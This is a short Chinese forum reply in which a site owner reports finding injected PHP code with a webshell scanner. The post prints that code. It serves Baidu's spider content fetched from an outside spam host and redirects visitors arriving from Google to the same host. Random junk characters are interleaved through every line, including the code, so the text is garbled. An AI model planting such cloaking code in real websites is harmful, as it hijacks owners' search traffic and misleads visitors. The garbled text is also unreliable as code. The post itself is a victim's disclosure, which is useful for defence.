|
|
楼主 |
发表于 2017-11-26 04:22:32
|
显示全部楼层
谢谢大家,用D盾查到问题了,被挂了一段代码:- t, P3 B v- j) ]. ^; k
$ z7 _* U* {. I
8 K6 V( D! o" J+ |, R/ ^1 H5 D! P2 C<?php! ^+ X1 T+ |9 c, L; v8 @; N" e
if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {
6 r2 m3 h& |, A$file = file_get_contents('http://www。zb128。cc');3 [/ J- g7 A) r$ s6 _; E+ U1 `6 @
echo $file;//
h# F* J! a% u$ aexit;9 K! }, U. W7 Q
}6 k) Z' v* _1 n ?$ V
if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {
3 K3 F1 z5 a) vHeader("Location: http://www。zb128。cc");//
+ V1 f) L5 a( J) S/ @) h2 {exit;
0 E$ y$ r0 \ h; _ q9 \- q} |
|